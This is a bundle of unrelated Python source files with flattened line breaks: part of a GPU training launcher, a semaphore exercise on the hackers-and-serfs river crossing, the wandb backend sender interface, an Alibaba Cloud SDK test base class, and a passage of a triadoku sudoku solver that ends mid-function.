[] for i in range(len(networks)): cuda_dict[i % core].append(networks[i]) # i % core #"/home/tyson/model_data/train_model_data" # "C:/Users/Marc/Desktop/model_data/train_model_data" train_path = "/home/tyson/data_cutoff/train_model_data" val_path = "/home/tyson/data_cutoff/val_model_data" pres = [] for i in range(core): pres.append(mp.Process(target=net_starter, args = (cuda_dict.get(i), f"cuda:{i}", fl, it, train_path, val_path,))) for process in pres: process.start() for process in pres: process.join()
cruceDelRio.py
#!/usr/bin/python # -*- coding: utf-8 -*- import threading import time import random umbral_balsa = 4 serfs = 0 hackers = 0 sem_balsa = threading.Semaphore(4) mutex_hackers = threading.Semaphore(1) barrera_hackers = threading.Semaphore(0) mutex_serfs = threading.Semaphore(1) def serf(yo): global serfs while True: mutex_serfs.acquire() serfs += 1 if (serfs == 4) : sem_balsa.release() elif (serfs == 2 and hackers == 2) : sem_balsa.release() mutex_hackers.release() barrera_hackers.acquire() print("Serf %d subió a la balsa" % serfs) def hacker(yo): global hackers while True: mutex_hackers.acquire() hackers += 1 if (hackers == 4) : sem_balsa.release() for i in range(umbral_balsa): barrera_hackers.release() mutex_hackers.release() barrera_hackers.acquire() print("Hacker %d subió a la balsa" % hackers) def balsa(): global hackers global serfs while True: sem_balsa.acquire() mutex_hackers.acquire() mutex_serfs.acquire() if (hackers == 4) : print("Balsa saliendo con %d hackers" % umbral_balsa) hackers -= 4 elif (serfs == 4) : print("Balsa saliendo con %d serfs" % umbral_balsa) serfs -= umbral_balsa elif (serfs == 2 and hackers == 2) : print("Balsa saliendo con 2 serfs y 2 hackers") serfs -=2 hackers-=2 else: print("Balsa esperando....") mutex_hackers.release() mutex_serfs.release() threading.Thread(target=balsa, args=[]).start() for i in range(10): threading.Thread(target=serf,args=[i]).start() for i in range(10): threading.Thread(target=hacker, args=[i]).start()
interface.py
# # -*- coding: utf-8 -*- """Backend Sender - Send to internal process Manage backend sender. """ import json import logging import threading import uuid import six from six.moves import queue import wandb from wandb import data_types from wandb.proto import wandb_internal_pb2 as pb from wandb.proto import wandb_telemetry_pb2 as tpb from wandb.util import ( get_h5_typename, json_dumps_safer, json_dumps_safer_history, json_friendly, json_friendly_val, maybe_compress_summary, WandBJSONEncoderOld, ) from .artifacts import ArtifactManifest from ..wandb_artifacts import Artifact if wandb.TYPE_CHECKING: import typing as t from . import summary_record as sr from typing import Any, Dict, Iterable, Optional, Tuple, Union from multiprocessing import Process from typing import cast from typing import TYPE_CHECKING if TYPE_CHECKING: from ..wandb_run import Run from six.moves.queue import Queue else: def cast(_, val): return val logger = logging.getLogger("wandb") def file_policy_to_enum(policy: str) -> "pb.FilesItem.PolicyTypeValue": if policy == "now": enum = pb.FilesItem.PolicyType.NOW elif policy == "end": enum = pb.FilesItem.PolicyType.END elif policy == "live": enum = pb.FilesItem.PolicyType.LIVE return enum def file_enum_to_policy(enum: "pb.FilesItem.PolicyTypeValue") -> str: if enum == pb.FilesItem.PolicyType.NOW: policy = "now" elif enum == pb.FilesItem.PolicyType.END: policy = "end" elif enum == pb.FilesItem.PolicyType.LIVE: policy = "live" return policy class _Future(object): _object: Optional[pb.Result] def __init__(self) -> None: self._object = None self._object_ready = threading.Event() self._lock = threading.Lock() def get(self, timeout: int = None) -> Optional[pb.Result]: is_set = self._object_ready.wait(timeout) if is_set and self._object: return self._object return None def _set_object(self, obj: pb.Result) -> None: self._object = obj self._object_ready.set() class MessageRouter(object): _pending_reqs: Dict[str, _Future] _request_queue: "Queue[pb.Record]" _response_queue: "Queue[pb.Result]" def __init__( self, request_queue: "Queue[pb.Record]", response_queue: "Queue[pb.Result]" ) -> None: self._request_queue = request_queue self._response_queue = response_queue self._pending_reqs = {} self._lock = threading.Lock() self._join_event = threading.Event() self._thread = threading.Thread(target=self.message_loop) self._thread.daemon = True self._thread.start() def message_loop(self) -> None: while not self._join_event.is_set(): try: msg = self._response_queue.get(timeout=1) except queue.Empty: continue self._handle_msg_rcv(msg) def send_and_receive(self, rec: pb.Record, local: Optional[bool] = None) -> _Future: rec.control.req_resp = True if local: rec.control.local = local rec.uuid = uuid.uuid4().hex future = _Future() with self._lock: self._pending_reqs[rec.uuid] = future self._request_queue.put(rec) return future def join(self) -> None: self._join_event.set() self._thread.join() def _handle_msg_rcv(self, msg: pb.Result) -> None: with self._lock: future = self._pending_reqs.pop(msg.uuid, None) if future is None: # TODO (cvp): saw this in tests, seemed benign enough to ignore, but # could point to other issues. if msg.uuid != "": logger.warning( "No listener found for msg with uuid %s (%s)", msg.uuid, msg ) return future._set_object(msg) class BackendSender(object): class ExceptionTimeout(Exception): pass record_q: Optional["Queue[pb.Record]"] result_q: Optional["Queue[pb.Result]"] process: Optional[Process] _run: Optional["Run"] _router: Optional[MessageRouter] def __init__( self, record_q: "Queue[pb.Record]" = None, result_q: "Queue[pb.Result]" = None, process: Process = None, ) -> None: self.record_q = record_q self.result_q = result_q self._process = process self._run = None self._router = None if record_q and result_q: self._router = MessageRouter(record_q, result_q) def _hack_set_run(self, run: "Run") -> None: self._run = run def publish_output(self, name: str, data: str) -> None: # from vendor.protobuf import google3.protobuf.timestamp # ts = timestamp.Timestamp() # ts.GetCurrentTime() # now = datetime.now() if name == "stdout": otype = pb.OutputRecord.OutputType.STDOUT elif name == "stderr": otype = pb.OutputRecord.OutputType.STDERR else: # TODO(jhr): throw error? print("unknown type") o = pb.OutputRecord(output_type=otype, line=data) o.timestamp.GetCurrentTime() self._publish_output(o) def _publish_output(self, outdata: pb.OutputRecord) -> None: rec = pb.Record() rec.output.CopyFrom(outdata) self._publish(rec) def publish_tbdata( self, log_dir: str, save: bool, root_logdir: Optional[str] ) -> None: tbrecord = pb.TBRecord() tbrecord.log_dir = log_dir tbrecord.save = save tbrecord.root_dir = root_logdir or "" rec = self._make_record(tbrecord=tbrecord) self._publish(rec) def _publish_history(self, history: pb.HistoryRecord) -> None: rec = self._make_record(history=history) self._publish(rec) def publish_history( self, data: dict, step: int = None, run: "Run" = None, publish_step: bool = True ) -> None: run = run or self._run data = data_types.history_dict_to_json(run, data, step=step) history = pb.HistoryRecord() if publish_step: assert step is not None history.step.num = step data.pop("_step", None) for k, v in six.iteritems(data): item = history.item.add() item.key = k item.value_json = json_dumps_safer_history(v) # type: ignore self._publish_history(history) def publish_telemetry(self, telem: tpb.TelemetryRecord) -> None: rec = self._make_record(telemetry=telem) self._publish(rec) def _make_run(self, run: "Run") -> pb.RunRecord: proto_run = pb.RunRecord() run._make_proto_run(proto_run) if run._settings.host: proto_run.host = run._settings.host if run._config is not None: config_dict = run._config._as_dict() # type: ignore self._make_config(data=config_dict, obj=proto_run.config) if run._telemetry_obj: proto_run.telemetry.MergeFrom(run._telemetry_obj) return proto_run def _make_artifact(self, artifact: Artifact) -> pb.ArtifactRecord: proto_artifact = pb.ArtifactRecord() proto_artifact.type = artifact.type proto_artifact.name = artifact.name proto_artifact.digest = artifact.digest if artifact.distributed_id: proto_artifact.distributed_id = artifact.distributed_id if artifact.description: proto_artifact.description = artifact.description if artifact.metadata: proto_artifact.metadata = json.dumps(json_friendly_val(artifact.metadata)) # type: ignore proto_artifact.incremental_beta1 = artifact.incremental self._make_artifact_manifest(artifact.manifest, obj=proto_artifact.manifest) return proto_artifact def _make_artifact_manifest( self, artifact_manifest: ArtifactManifest, obj: pb.ArtifactManifest = None ) -> pb.ArtifactManifest: proto_manifest = obj or pb.ArtifactManifest() proto_manifest.version = artifact_manifest.version() # type: ignore proto_manifest.storage_policy = artifact_manifest.storage_policy.name() for k, v in artifact_manifest.storage_policy.config().items() or {}.items(): cfg = proto_manifest.storage_policy_config.add() cfg.key = k cfg.value_json = json.dumps(v) for entry in sorted(artifact_manifest.entries.values(), key=lambda k: k.path): # type: ignore proto_entry = proto_manifest.contents.add() proto_entry.path = entry.path proto_entry.digest = entry.digest if entry.size: proto_entry.size = entry.size if entry.birth_artifact_id: proto_entry.birth_artifact_id = entry.birth_artifact_id if entry.ref: proto_entry.ref = entry.ref if entry.local_path: proto_entry.local_path = entry.local_path for k, v in entry.extra.items(): proto_extra = proto_entry.extra.add() proto_extra.key = k proto_extra.value_json = json.dumps(v) return proto_manifest def _make_exit(self, exit_code: int) -> pb.RunExitRecord: exit = pb.RunExitRecord() exit.exit_code = exit_code return exit def _make_config( self, data: dict = None, key: Union[Tuple[str, ...], str] = None, val: Any = None, obj: pb.ConfigRecord = None, ) -> pb.ConfigRecord: config = obj or pb.ConfigRecord() if data: for k, v in six.iteritems(data): update = config.update.add() update.key = k update.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore if key: update = config.update.add() if isinstance(key, tuple): for k in key: update.nested_key.append(k) else: update.key = key update.value_json = json_dumps_safer(json_friendly(val)[0]) # type: ignore return config def _make_stats(self, stats_dict: dict) -> pb.StatsRecord: stats = pb.StatsRecord() stats.stats_type = pb.StatsRecord.StatsType.SYSTEM stats.timestamp.GetCurrentTime() for k, v in six.iteritems(stats_dict): item = stats.item.add() item.key = k item.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore return stats def _summary_encode(self, value: t.Any, path_from_root: str) -> dict: """Normalize, compress, and encode sub-objects for backend storage. value: Object to encode. path_from_root: `str` dot separated string from the top-level summary to the current `value`. Returns: A new tree of dict's with large objects replaced with dictionaries with "_type" entries that say which type the original data was. """ # Constructs a new `dict` tree in `json_value` that discards and/or # encodes objects that aren't JSON serializable. if isinstance(value, dict): json_value = {} for key, value in six.iteritems(value): json_value[key] = self._summary_encode( value, path_from_root + "." + key ) return json_value else: friendly_value, converted = json_friendly( # type: ignore data_types.val_to_json( self._run, path_from_root, value, namespace="summary" ) ) json_value, compressed = maybe_compress_summary( # type: ignore friendly_value, get_h5_typename(value) # type: ignore ) if compressed: # TODO(jhr): impleement me pass # self.write_h5(path_from_root, friendly_value) return json_value def _make_summary_from_dict(self, summary_dict: dict) -> pb.SummaryRecord: summary = pb.SummaryRecord() for k, v in six.iteritems(summary_dict): update = summary.update.add() update.key = k update.value_json = json.dumps(v) return summary def _make_summary(self, summary_record: sr.SummaryRecord) -> pb.SummaryRecord: pb_summary_record = pb.SummaryRecord() for item in summary_record.update: pb_summary_item = pb_summary_record.update.add() key_length = len(item.key) assert key_length > 0 if key_length > 1: pb_summary_item.nested_key.extend(item.key) else: pb_summary_item.key = item.key[0] path_from_root = ".".join(item.key) json_value = self._summary_encode(item.value, path_from_root) json_value, _ = json_friendly(json_value) # type: ignore pb_summary_item.value_json = json.dumps( json_value, cls=WandBJSONEncoderOld, ) for item in summary_record.remove: pb_summary_item = pb_summary_record.remove.add() key_length = len(item.key) assert key_length > 0 if key_length > 1: pb_summary_item.nested_key.extend(item.key) else: pb_summary_item.key = item.key[0] return pb_summary_record def _make_files(self, files_dict: dict) -> pb.FilesRecord: files = pb.FilesRecord() for path, policy in files_dict["files"]: f = files.files.add() f.path = path f.policy = file_policy_to_enum(policy) return files def _make_login(self, api_key: str = None) -> pb.LoginRequest: login = pb.LoginRequest() if api_key: login.api_key = api_key return login def _make_request( self, login: pb.LoginRequest = None, get_summary: pb.GetSummaryRequest = None, pause: pb.PauseRequest = None, resume: pb.ResumeRequest = None, stop_status: pb.StopStatusRequest = None, network_status: pb.NetworkStatusRequest = None, poll_exit: pb.PollExitRequest = None, sampled_history: pb.SampledHistoryRequest = None, run_start: pb.RunStartRequest = None, check_version: pb.CheckVersionRequest = None, log_artifact: pb.LogArtifactRequest = None, defer: pb.DeferRequest = None, ) -> pb.Record: request = pb.Request() if login: request.login.CopyFrom(login) elif get_summary: request.get_summary.CopyFrom(get_summary) elif pause: request.pause.CopyFrom(pause) elif resume: request.resume.CopyFrom(resume) elif stop_status: request.stop_status.CopyFrom(stop_status) elif network_status: request.network_status.CopyFrom(network_status) elif poll_exit: request.poll_exit.CopyFrom(poll_exit) elif sampled_history: request.sampled_history.CopyFrom(sampled_history) elif run_start: request.run_start.CopyFrom(run_start) elif check_version: request.check_version.CopyFrom(check_version) elif log_artifact: request.log_artifact.CopyFrom(log_artifact) elif defer: request.defer.CopyFrom(defer) else: raise Exception("Invalid request") record = self._make_record(request=request) # All requests do not get persisted record.control.local = True return record def _make_record( self, run: pb.RunRecord = None, config: pb.ConfigRecord = None, files: pb.FilesRecord = None, summary: pb.SummaryRecord = None, history: pb.HistoryRecord = None, stats: pb.StatsRecord = None, exit: pb.RunExitRecord = None, artifact: pb.ArtifactRecord = None, tbrecord: pb.TBRecord = None, alert: pb.AlertRecord = None, final: pb.FinalRecord = None, metric: pb.MetricRecord = None, header: pb.HeaderRecord = None, footer: pb.FooterRecord = None, request: pb.Request = None, telemetry: tpb.TelemetryRecord = None, ) -> pb.Record: record = pb.Record() if run: record.run.CopyFrom(run) elif config: record.config.CopyFrom(config) elif summary: record.summary.CopyFrom(summary) elif history: record.history.CopyFrom(history) elif files: record.files.CopyFrom(files) elif stats: record.stats.CopyFrom(stats) elif exit: record.exit.CopyFrom(exit) elif artifact: record.artifact.CopyFrom(artifact) elif tbrecord: record.tbrecord.CopyFrom(tbrecord) elif alert: record.alert.CopyFrom(alert) elif final: record.final.CopyFrom(final) elif header: record.header.CopyFrom(header) elif footer: record.footer.CopyFrom(footer) elif request: record.request.CopyFrom(request) elif telemetry: record.telemetry.CopyFrom(telemetry) elif metric: record.metric.CopyFrom(metric) else: raise Exception("Invalid record") return record def _publish(self, record: pb.Record, local: bool = None) -> None: if self._process and not self._process.is_alive(): raise Exception("The wandb backend process has shutdown") if local: record.control.local = local if self.record_q: self.record_q.put(record) def _communicate( self, rec: pb.Record, timeout: Optional[int] = 5, local: bool = None ) -> Optional[pb.Result]: return self._communicate_async(rec, local=local).get(timeout=timeout) def _communicate_async(self, rec: pb.Record, local: bool = None) -> _Future: assert self._router future = self._router.send_and_receive(rec, local=local) return future def communicate_login( self, api_key: str = None, timeout: Optional[int] = 15 ) -> pb.LoginResponse: login = self._make_login(api_key) rec = self._make_request(login=login) result = self._communicate(rec, timeout=timeout) if result is None: # TODO: friendlier error message here raise wandb.Error( "Couldn't communicate with backend after %s seconds" % timeout ) login_response = result.response.login_response assert login_response return login_response def _publish_defer(self, state: "pb.DeferRequest.DeferStateValue") -> None: defer = pb.DeferRequest(state=state) rec = self._make_request(defer=defer) self._publish(rec, local=True) def publish_defer(self, state: int = 0) -> None: self._publish_defer(cast("pb.DeferRequest.DeferStateValue", state)) def publish_header(self) -> None: header = pb.HeaderRecord() rec = self._make_record(header=header) self._publish(rec) def publish_footer(self) -> None: footer = pb.FooterRecord() rec = self._make_record(footer=footer) self._publish(rec) def publish_final(self) -> None: final = pb.FinalRecord() rec = self._make_record(final=final) self._publish(rec) def publish_login(self, api_key: str = None) -> None: login = self._make_login(api_key) rec = self._make_request(login=login) self._publish(rec) def publish_pause(self) -> None: pause = pb.PauseRequest() rec = self._make_request(pause=pause) self._publish(rec) def publish_resume(self) -> None: resume = pb.ResumeRequest() rec = self._make_request(resume=resume) self._publish(rec) def _publish_run(self, run: pb.RunRecord) -> None: rec = self._make_record(run=run) self._publish(rec) def publish_run(self, run_obj: "Run") -> None: run = self._make_run(run_obj) self._publish_run(run) def publish_config( self, data: dict = None, key: Union[Tuple[str, ...], str] = None, val: Any = None, ) -> None: cfg = self._make_config(data=data, key=key, val=val) self._publish_config(cfg) def _publish_config(self, cfg: pb.ConfigRecord) -> None: rec = self._make_record(config=cfg) self._publish(rec) def publish_summary(self, summary_record: sr.SummaryRecord) -> None: pb_summary_record = self._make_summary(summary_record) self._publish_summary(pb_summary_record) def _publish_summary(self, summary: pb.SummaryRecord) -> None: rec = self._make_record(summary=summary) self._publish(rec) def _publish_metric(self, metric: pb.MetricRecord) -> None: rec = self._make_record(metric=metric) self._publish(rec) def _communicate_run( self, run: pb.RunRecord, timeout: int = None ) -> Optional[pb.RunUpdateResult]: """Send synchronous run object waiting for a response. Arguments: run: RunRecord object timeout: number of seconds to wait Returns: RunRecord object """ req = self._make_record(run=run) resp = self._communicate(req, timeout=timeout) if resp is None: logger.info("couldn't get run from backend") # Note: timeouts handled by callers: wandb_init.py return None assert resp.HasField("run_result") return resp.run_result def communicate_run( self, run_obj: "Run", timeout: int = None ) -> Optional[pb.RunUpdateResult]: run = self._make_run(run_obj) return self._communicate_run(run, timeout=timeout) def publish_stats(self, stats_dict: dict) -> None: stats = self._make_stats(stats_dict) rec = self._make_record(stats=stats) self._publish(rec) def publish_files(self, files_dict: dict) -> None: files = self._make_files(files_dict) rec = self._make_record(files=files) self._publish(rec) def communicate_artifact( self, run: "Run", artifact: Artifact, aliases: Iterable[str], is_user_created: bool = False, use_after_commit: bool = False, finalize: bool = True, ) -> _Future: proto_run = self._make_run(run) proto_artifact = self._make_artifact(artifact) proto_artifact.run_id = proto_run.run_id proto_artifact.project = proto_run.project proto_artifact.entity = proto_run.entity proto_artifact.user_created = is_user_created proto_artifact.use_after_commit = use_after_commit proto_artifact.finalize = finalize for alias in aliases: proto_artifact.aliases.append(alias) log_artifact = pb.LogArtifactRequest() log_artifact.artifact.CopyFrom(proto_artifact) rec = self._make_request(log_artifact=log_artifact) return self._communicate_async(rec) def publish_artifact( self, run: "Run", artifact: Artifact, aliases: Iterable[str], is_user_created: bool = False, use_after_commit: bool = False, finalize: bool = True, ) -> None: proto_run = self._make_run(run) proto_artifact = self._make_artifact(artifact) proto_artifact.run_id = proto_run.run_id proto_artifact.project = proto_run.project proto_artifact.entity = proto_run.entity proto_artifact.user_created = is_user_created proto_artifact.use_after_commit = use_after_commit proto_artifact.finalize = finalize for alias in aliases: proto_artifact.aliases.append(alias) rec = self._make_record(artifact=proto_artifact) self._publish(rec) def publish_alert( self, title: str, text: str, level: str, wait_duration: int ) -> None: proto_alert = pb.AlertRecord() proto_alert.title = title proto_alert.text = text proto_alert.level = level proto_alert.wait_duration = wait_duration rec = self._make_record(alert=proto_alert) self._publish(rec) def communicate_stop_status( self, timeout: int = None ) -> Optional[pb.StopStatusResponse]: status = pb.StopStatusRequest() req = self._make_request(stop_status=status) resp = self._communicate(req, timeout=timeout, local=True) if resp is None: return None assert resp.response.stop_status_response return resp.response.stop_status_response def communicate_network_status( self, timeout: int = None ) -> Optional[pb.NetworkStatusResponse]: status = pb.NetworkStatusRequest() req = self._make_request(network_status=status) resp = self._communicate(req, timeout=timeout, local=True) if resp is None: return None assert resp.response.network_status_response return resp.response.network_status_response def publish_exit(self, exit_code: int) -> None: exit_data = self._make_exit(exit_code) rec = self._make_record(exit=exit_data) self._publish(rec) def _communicate_exit( self, exit_data: pb.RunExitRecord, timeout: int = None ) -> pb.RunExitResult: req = self._make_record(exit=exit_data) result = self._communicate(req, timeout=timeout) if result is None: # TODO: friendlier error message here raise wandb.Error( "Couldn't communicate with backend after %s seconds" % timeout ) assert result.exit_result return result.exit_result def communicate_poll_exit( self, timeout: int = None ) -> Optional[pb.PollExitResponse]: poll_request = pb.PollExitRequest() rec = self._make_request(poll_exit=poll_request) result = self._communicate(rec, timeout=timeout) if result is None: return None poll_exit_response = result.response.poll_exit_response assert poll_exit_response return poll_exit_response def communicate_check_version( self, current_version: str = None ) -> Optional[pb.CheckVersionResponse]: check_version = pb.CheckVersionRequest() if current_version: check_version.current_version = current_version rec = self._make_request(check_version=check_version) result = self._communicate(rec) if result is None: # Note: timeouts handled by callers: wandb_init.py return None return result.response.check_version_response def communicate_run_start(self, run_pb: pb.RunRecord) -> Optional[pb.Result]: run_start = pb.RunStartRequest() run_start.run.CopyFrom(run_pb) rec = self._make_request(run_start=run_start) result = self._communicate(rec) return result def communicate_exit(self, exit_code: int, timeout: int = None) -> pb.RunExitResult: exit_data = self._make_exit(exit_code) return self._communicate_exit(exit_data, timeout=timeout) def communicate_summary(self) -> Optional[pb.GetSummaryResponse]: record = self._make_request(get_summary=pb.GetSummaryRequest()) result = self._communicate(record, timeout=10) if result is None: return None get_summary_response = result.response.get_summary_response assert get_summary_response return get_summary_response def communicate_sampled_history(self) -> Optional[pb.SampledHistoryResponse]: record = self._make_request(sampled_history=pb.SampledHistoryRequest()) result = self._communicate(record) if result is None: return None sampled_history_response = result.response.sampled_history_response assert sampled_history_response return sampled_history_response def join(self) -> None: # shutdown request = pb.Request(shutdown=pb.ShutdownRequest()) record = self._make_record(request=request) _ = self._communicate(record) if self._router: self._router.join()
base.py
# Copyright 2018 Alibaba Cloud Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os.path import json import os import threading import logging import time import sys from aliyunsdkcore.client import AcsClient from aliyunsdkcore.vendored.six import iteritems from aliyunsdkcore.acs_exception.exceptions import ServerException from aliyunsdkram.request.v20150501.ListUsersRequest import ListUsersRequest from aliyunsdkram.request.v20150501.CreateUserRequest import CreateUserRequest from aliyunsdkram.request.v20150501.CreateAccessKeyRequest import CreateAccessKeyRequest from aliyunsdkram.request.v20150501.DeleteAccessKeyRequest import DeleteAccessKeyRequest from aliyunsdkram.request.v20150501.ListAccessKeysRequest import ListAccessKeysRequest from aliyunsdkram.request.v20150501.ListRolesRequest import ListRolesRequest from aliyunsdkram.request.v20150501.CreateRoleRequest import CreateRoleRequest from aliyunsdkram.request.v20150501.DeleteRoleRequest import DeleteRoleRequest from aliyunsdkram.request.v20150501.AttachPolicyToUserRequest import AttachPolicyToUserRequest # The unittest module got a significant overhaul # in 2.7, so if we're in 2.6 we can use the backported # version unittest2. if sys.version_info[:2] == (2, 6): from unittest2 import TestCase else: from unittest import TestCase # the version under py3 use the different package if sys.version_info[0] == 3: from http.server import SimpleHTTPRequestHandler from http.server import HTTPServer else: from SimpleHTTPServer import SimpleHTTPRequestHandler from BaseHTTPServer import HTTPServer def request_helper(client, request, **params): for key, value in iteritems(params): set_name = 'set_' + key if hasattr(request, set_name): func = getattr(request, set_name) func(value) else: raise Exception( "{0} has no parameter named {1}.".format(request.__class__.__name__, key)) response = client.do_action_with_exception(request) return json.loads(response.decode('utf-8')) def _check_server_response(obj, key): if key not in obj: raise Exception("No '{0}' in server response.".format(key)) def find_in_response(response, key=None, keys=None): if key: _check_server_response(response, key) return response[key] if keys: obj = response for key in keys: _check_server_response(obj, key) obj = obj[key] return obj class SDKTestBase(TestCase): def __init__(self, *args, **kwargs): TestCase.__init__(self, *args, **kwargs) # if sys.version_info[0] == 2: # self.assertRegex = self.assertRegexpMatches self._init_env() def test_env_available(self): # To let test script know whether env is available, to continue the tests self._init_env() def _init_env(self): self._sdk_config = self._init_sdk_config() self.access_key_id = self._read_key_from_env_or_config("ACCESS_KEY_ID") self.access_key_secret = self._read_key_from_env_or_config("ACCESS_KEY_SECRET") self.region_id = self._read_key_from_env_or_config("REGION_ID") self.user_id = self._read_key_from_env_or_config("USER_ID") self.root_user_id = self._read_key_from_env_or_config("ROOT_UID") if 'TRAVIS_JOB_NUMBER' in os.environ: self.travis_concurrent = os.environ.get('TRAVIS_JOB_NUMBER').split(".")[-1] else: self.travis_concurrent = "0" self.default_ram_user_name = "RamUserForSDKCredentialsTest" + self.travis_concurrent self.default_ram_role_name = "RamROleForSDKTest" + self.travis_concurrent self.default_role_session_name = "RoleSession" + self.travis_concurrent self.ram_user_id = None self.ram_policy_attched = False self.ram_user_access_key_id = None self.ram_user_access_key_secret = None self.ram_role_arn = None def _init_sdk_config(self): sdk_config_path = os.path.join(os.path.expanduser("~"), "aliyun_sdk_config.json") if os.path.isfile(sdk_config_path): with open(sdk_config_path) as fp: return json.loads(fp.read()) def _read_key_from_env_or_config(self, key_name): if key_name.upper() in os.environ: return os.environ.get(key_name.upper()) if key_name.lower() in self._sdk_config: return self._sdk_config[key_name.lower()] raise Exception("Failed to find sdk config: " + key_name) def setUp(self): TestCase.setUp(self) self.client = self.init_client() def tearDown(self): pass def init_client(self, region_id=None): if not region_id: region_id = self.region_id client = AcsClient(self.access_key_id, self.access_key_secret, region_id, timeout=120) client.set_stream_logger() return client @staticmethod def get_dict_response(string): return json.loads(string.decode('utf-8'), encoding="utf-8") def _create_default_ram_user(self): if self.ram_user_id: return response = request_helper(self.client, ListUsersRequest()) user_list = find_in_response(response, keys=['Users', 'User']) for user in user_list: if user['UserName'] == self.default_ram_user_name: self.ram_user_id = user["UserId"] return response = request_helper(self.client, CreateUserRequest(), UserName=self.default_ram_user_name) self.ram_user_id = find_in_response(response, keys=['User', 'UserId']) def _attach_default_policy(self): if self.ram_policy_attched: return try: request_helper(self.client, AttachPolicyToUserRequest(), PolicyType='System', PolicyName='AliyunSTSAssumeRoleAccess', UserName=self.default_ram_user_name) except ServerException as e: if e.get_error_code() == 'EntityAlreadyExists.User.Policy': pass else: raise e self.ram_policy_attched = True def _create_access_key(self): if self.ram_user_access_key_id and self.ram_user_access_key_secret: return response = request_helper(self.client, ListAccessKeysRequest(), UserName=self.default_ram_user_name) for access_key in find_in_response(response, keys=['AccessKeys', 'AccessKey']): access_key_id = access_key['AccessKeyId'] request_helper(self.client, DeleteAccessKeyRequest(), UserAccessKeyId=access_key_id, UserName=self.default_ram_user_name) response = request_helper(self.client, CreateAccessKeyRequest(), UserName=self.default_ram_user_name) self.ram_user_access_key_id = find_in_response(response, keys=['AccessKey', 'AccessKeyId']) self.ram_user_access_key_secret = find_in_response( response, keys=['AccessKey', 'AccessKeySecret']) def _delete_access_key(self): request_helper(self.client, DeleteAccessKeyRequest(), UserName=self.default_ram_user_name, UserAccessKeyId=self.ram_user_access_key_id) def init_sub_client(self): self._create_default_ram_user() self._attach_default_policy() self._create_access_key() client = AcsClient(self.ram_user_access_key_id, self.ram_user_access_key_secret, self.region_id, timeout=120) return client def _create_default_ram_role(self): if self.ram_role_arn: return response = request_helper(self.client, ListRolesRequest()) for role in find_in_response(response, keys=['Roles', 'Role']): role_name = role['RoleName'] role_arn = role['Arn'] if role_name == self.default_ram_role_name: self.ram_role_arn = role_arn return policy_doc = """ { "Statement": [ { "Action": "sts:AssumeRole", "Effect": "Allow", "Principal": { "RAM": [ "acs:ram::%s:root" ] } } ], "Version": "1" } """ % self.root_user_id response = request_helper(self.client, CreateRoleRequest(), RoleName=self.default_ram_role_name, AssumeRolePolicyDocument=policy_doc) self.ram_role_arn = find_in_response(response, keys=['Role', 'Arn']) # FIXME We have wait for 5 seconds after CreateRole before # we can AssumeRole later time.sleep(5) def _delete_default_ram_role(self): request_helper(self.client, DeleteRoleRequest(), RoleName=self.default_ram_role_name) def disabled(func): def _decorator(func): pass return _decorator class MyServer: _headers = {} _url = '' def __enter__(self): class ServerHandler(SimpleHTTPRequestHandler): def do_GET(_self): _self.protocol_version = 'HTTP/1.1' self._headers = _self.headers self._url = _self.path _self.send_response(200) _self.send_header("Content-type", "application/json") _self.end_headers() _self.wfile.write(b"{}") self.server = HTTPServer(("", 51352), ServerHandler) def thread_func(): self.server.serve_forever() thread = threading.Thread(target=thread_func) thread.start() return self def __exit__(self, exc_type, exc_val, exc_tb): if self.server: self.server.shutdown() self.server = None @property def headers(self): return self._headers @property def url(self): return self._url
sudoku_triadoku_multicore.py
import math import copy import multiprocessing import argparse import sys input = [[0,0,6, 0,0,0, 0,0,0], [0,0,0, 0,0,0, 0,4,0], [1,0,9, 0,0,0, 0,0,0], [0,8,0, 0,0,0, 0,3,0], [0,0,2, 5,0,1, 4,0,0], [3,4,0, 8,0,7, 0,0,0], [0,0,0, 0,6,0, 0,0,7], [0,3,0, 0,5,0, 0,0,1], [4,0,0, 0,0,1, 0,0,9]] #nput = [[4, 8, 6, 5, 2, 3, 9, 1, 5], [3, 2, 0, 6, 6, 6, 9, 4, 1], [1, 5, 9, 8, 8, 4, 3, 2, 6], [0, 8, 0, 0, 0, 0, 0, 3, 0], [6, 0, 2, 5, 0, 5, 4, 0, 0], [3, 4, 2, 8, 6, 7, 0, 6, 2], [2, 0, 0, 2, 6, 0, 2, 0, 7], [0, 3, 4, 0, 5, 4, 0, 9, 1], [4, 5, 0, 0, 5, 1, 8, 5, 9]] def findNextCellToFill(grid, i, j): for x in range(i,len(grid)): for y in range(j,len(grid[x])): if grid[x][y] == 0: return x,y for x in range(0,len(grid)): for y in range(0,len(grid[x])): if grid[x][y] == 0: return x,y return -1,-1 def isValidSudoku(grid, i, j, e): squareOk = all([e != grid[i][x] for x in range(9)]) if squareOk: r = int(math.floor(j/3)) c = j % 3 rowOk = True columnOk = True ii = int(math.floor(i/3)) if (i == 0) or (i == 1) or (i == 2): rowOk = all([e != grid[ii*3][(r*3)+x] for x in range(3)]) and all([e != grid[ii*3+1][(r*3)+x] for x in range(3)]) and all([e != grid[ii*3+2][ r*3 + x ] for x in range(3)]) if (i == 0) or (i == 7) or (i == 5): columnOk = all([e != grid[0][c+(x*3)] for x in range(3)]) and all([e != grid[7][c+ (x*3)] for x in range(3)]) and all([e != grid[5][c+ (x*3)] for x in range(3)]) if (i == 3) or (i == 1) or (i == 8): columnOk = all([e != grid[3][c+(x*3)] for x in range(3)]) and all([e != grid[1][c+ (x*3)] for x in range(3)]) and all( [e != grid[8][c+ (x*3)] for x in range(3)]) if (i == 6) or (i == 4) or (i == 2): columnOk = all([e != grid[6][c+(x*3)] for x in range(3)]) and all([e != grid[4][c+ (x*3)] for x in range(3)]) and all( [e != grid[2][c+ (x*3)] for x in range(3)]) if rowOk and columnOk: return True return False def findoptions(grid): options = [] nr_options = 0 for i in range (0, len(grid)): sq_options = [] for j in range (0, len(grid[i])): cell_options = [] if (grid[i][j] == 0): for e in range(1,10): if isValidSudoku(grid,i,j,e): cell_options.append(e) else: cell_options.append(grid[i][j]) if (len(cell_options) > 1): nr_options += len(cell_options) 